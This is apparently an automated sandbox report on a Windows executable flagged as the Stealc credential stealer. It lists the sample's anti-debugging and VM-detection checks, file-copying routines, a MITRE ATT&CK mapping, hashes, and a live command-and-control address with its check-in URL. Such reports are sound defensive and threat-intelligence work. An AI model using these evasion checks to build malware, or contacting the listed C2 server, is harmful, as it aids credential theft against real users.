                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1040EEA second address: 1040EF1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1041083 second address: 10410AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8114D9D1FEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F8114D9D1FAh 0x00000011 jc 00007F8114D9D1FCh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: E91BDB instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: E91BB6 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 1036833 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 1034E2B instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: E8F1BE instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 105B608 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 10BF9B3 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C438B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00C438B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C44910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00C44910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C3DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00C3DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C3E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00C3E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C44570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00C44570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C3ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00C3ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C316D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00C316D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C43EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00C43EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C3F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00C3F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C3BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00C3BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C3DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00C3DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C31160 GetSystemInfo,ExitProcess,0_2_00C31160
                Source: file.exe, file.exe, 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1312008954.0000000001A55000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWn
                Source: file.exe, 00000000.00000002.1312008954.0000000001A25000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
                Source: file.exe, 00000000.00000002.1312008954.00000000019DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1312008954.0000000001A55000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: file.exe, 00000000.00000002.1312008954.00000000019DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware.
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13541
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13549
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13527
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13530
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13581
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C345C0 VirtualProtect ?,00000004,00000100,000000000_2_00C345C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C49860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00C49860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C49750 mov eax, dword ptr fs:[00000030h]0_2_00C49750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C478E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,0_2_00C478E0
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6996, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C49600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00C49600
                Source: file.exe, file.exe, 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00C47B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C47980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_00C47980
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C47850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00C47850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C47A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00C47A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.c30000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1312008954.00000000019DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1268244294.00000000055E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6996, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.c30000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1312008954.00000000019DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1268244294.00000000055E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6996, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe45%ReversingLabsWin32.Trojan.Generic
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php100%URL Reputationmalware

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/true
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.phptrue
                • URL Reputation: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://185.215.113.37/e2b1563c6670f193.phpWindowsfile.exe, 00000000.00000002.1312008954.0000000001A38000.00000004.00000020.00020000.00000000.sdmptrue
                  		unknown
                  http://185.215.113.37/e2b1563c6670f193.php2file.exe, 00000000.00000002.1312008954.0000000001A38000.00000004.00000020.00020000.00000000.sdmptrue
                    		unknown
                    http://185.215.113.37/e2b1563c6670f193.phpBfile.exe, 00000000.00000002.1312008954.0000000001A38000.00000004.00000020.00020000.00000000.sdmptrue
                      		unknown
                      http://185.215.113.37file.exe, 00000000.00000002.1312008954.00000000019DE000.00000004.00000020.00020000.00000000.sdmptrue
                      • URL Reputation: malware
                      		unknown
                      http://185.215.113.37/e2b1563c6670f193.php&file.exe, 00000000.00000002.1312008954.0000000001A38000.00000004.00000020.00020000.00000000.sdmptrue
                        		unknown
                        http://185.215.113.37/e2b1563c6670f193.phpDfile.exe, 00000000.00000002.1312008954.0000000001A38000.00000004.00000020.00020000.00000000.sdmptrue
                          		unknown
                          http://185.215.113.37/wsfile.exe, 00000000.00000002.1312008954.0000000001A38000.00000004.00000020.00020000.00000000.sdmptrue
                            		unknown
                            http://185.215.113.37/e2b1563c6670f193.phpjfile.exe, 00000000.00000002.1312008954.0000000001A38000.00000004.00000020.00020000.00000000.sdmptrue
                              		unknown

                              World Map of Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public IPs

                              IPDomainCountryFlagASNASN NameMalicious
                              185.215.113.37
                              		unknownPortugal
                              		206894WHOLESALECONNECTIONSNLtrue

                              General Information

                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1528566
                              Start date and time:2024-10-08 02:09:04 +02:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 5m 4s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:15
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:file.exe
                              Detection:MAL
                              Classification:mal100.troj.evad.winEXE@1/0@0/1
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:
                              • Successful, ratio: 80%
                              • Number of executed functions: 18
                              • Number of non-executed functions: 92
                              Cookbook Comments:
                              • Found application associated with file extension: .exe

                              Warnings

                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                              • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                              • Not all processes where analyzed, report is missing behavior information
                              • VT rate limit hit for: file.exe

                              Simulations

                              Behavior and APIs

                              No simulations

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              185.215.113.37file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.215.113.37/e2b1563c6670f193.php

                              Domains

                              No context

                              ASNs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37
                              file.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.215.113.37
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37
                              file.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.215.113.37
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37
                              file.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.215.113.37
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37
                              file.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.215.113.37

                              JA3 Fingerprints

                              No context

                              Dropped Files

                              No context

                              Created / dropped Files

                              No created / dropped files found

                              Static File Info

                              General

                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Entropy (8bit):7.947534593862265
                              TrID:
                              • Win32 Executable (generic) a (10002005/4) 99.96%
                              • Generic Win/DOS Executable (2004/3) 0.02%
                              • DOS Executable Generic (2002/1) 0.02%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:file.exe
                              File size:1'811'968 bytes
                              MD5:a5d18ff9a3069cd251170021b5a0da87
                              SHA1:2bf3ebe6be6c5a2892335cee98d6e338506458d0
                              SHA256:5ec5e0e9c3636bbf6380c00672bf9c8fb36ec1aef7095cc051243ad8830ca23a
                              SHA512:51a1036943915e37718fe42c6d47c7e3aa4d8a3e0ff585a4cbe97b5a88b12090098825d29904a1bcef85927a1dd21617a6d58969affea579710b0745a91e68cc
                              SSDEEP:49152:2mzg6C1fd9KfQElGmLW0snxkSU2ODwJB:2m0x1fOD608hU2ODwJB
                              TLSH:AB8533803A7BD7D5ED5C423374AD544C384903C441AEFBD52A1B26ABF38A7EF496A0C5
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

                              File Icon

                              Icon Hash:00928e8e8686b000

                              Static PE Info

                              General

                              Entrypoint:0xa8c000
                              Entrypoint Section:.taggant
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                              Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:5
                              OS Version Minor:1
                              File Version Major:5
                              File Version Minor:1
                              Subsystem Version Major:5
                              Subsystem Version Minor:1
                              Import Hash:2eabe9054cad5152567f0699947a2c5b

                              Entrypoint Preview

                              Instruction
                              jmp 00007F8114D83EEAh
                              je 00007F8114D83F01h
                              add byte ptr [eax], al
                              jmp 00007F8114D85EE5h
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al

                              Rich Headers

                              Programming Language:
                              • [C++] VS2010 build 30319
                              • [ASM] VS2010 build 30319
                              • [ C ] VS2010 build 30319
                              • [ C ] VS2008 SP1 build 30729
                              • [IMP] VS2008 SP1 build 30729
                              • [LNK] VS2010 build 30319

                              Data Directories

                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                              Sections

                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              0x10000x25b0000x2280018677f6caf1fe1fc31307d1c4187caf6unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .idata 0x25d0000x10000x200c60c4959cc8d384ac402730cc6842bb0False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              0x25e0000x2980000x200ee54d2bced4e9ef1fb5d1cf7a4ac05b4unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              iobnflrc0x4f60000x1950000x194400e06b9427a183b458ae58d45d9a00abdfFalse0.9950398838512677data7.954448270760046IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              wmcwbjql0x68b0000x10000x40069d4e1154289edcdeeb82a3b0d824000False0.810546875data6.287836181069777IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .taggant0x68c0000x30000x2200105b1756482896c211a78104af5e7b88False0.006433823529411764DOS executable (COM)0.019571456231530684IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                              Imports

                              DLLImport
                              kernel32.dlllstrcpy

                              Network Behavior

                              Suricata IDS Alerts

                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                              2024-10-08T02:10:03.429876+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.749700185.215.113.3780TCP

                              Network Port Distribution

                              TCP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Oct 8, 2024 02:10:02.484103918 CEST4970080192.168.2.7185.215.113.37
                              Oct 8, 2024 02:10:02.489062071 CEST8049700185.215.113.37192.168.2.7
